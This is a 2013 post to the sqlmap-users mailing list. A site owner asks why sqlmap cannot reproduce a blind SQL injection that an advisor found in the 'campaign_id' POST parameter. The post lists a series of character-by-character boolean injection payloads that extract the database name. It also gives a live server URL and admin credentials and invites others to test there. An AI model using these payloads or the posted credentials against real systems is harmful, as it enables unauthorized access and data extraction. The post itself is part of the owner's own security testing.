[sqlmap-users] Blind SQL Injection question
Brought to you by:
inquisb
Menu
▾
▴
[sqlmap-users] Blind SQL Injection question
|
From: Guy D. <yam...@gm...> - 2013-05-22 23:53:49
|
My script is installed on http://myimg.co/trk/lpg/ login " admin ", password " hello " A security advisor told me that it's injectable while being logged in manually by modifying the POST param "campaign_id" Example: Change " 129*US-LP-PPV*PPV********* " to : 129 and ascii(substring((SELECT database()),1,1))>108*p*ts'********* 109 129 and ascii(substring((SELECT database()),2,1))>120*p*ts'********* 121 129 and ascii(substring((SELECT database()),3,1))>104*p*ts'********* 105 129 and ascii(substring((SELECT database()),4,1))>108*p*ts'********* 109 129 and ascii(substring((SELECT database()),5,1))>102*p*ts'********* 103 129 and ascii(substring((SELECT database()),6,1))>98*p*ts'********* 99 129 and ascii(substring((SELECT database()),7,1))>110*p*ts'********* 111 129 and ascii(substring((SELECT database()),8,1))>94*p*ts'********* 95 129 and ascii(substring((SELECT database()),9,1))>98*p*ts'********* 99 129 and ascii(substring((SELECT database()),10,1))>111*p*ts'********* 112 129 and ascii(substring((SELECT database()),11,1))>117*p*ts'********* 118 This gives database name = myimgco_cpv However I can't seem to be able to make this work in SQLmap.. Do you guys have any idea? You can try to reproduce this on my server, without breaking anything please :) Thanks a lot! |
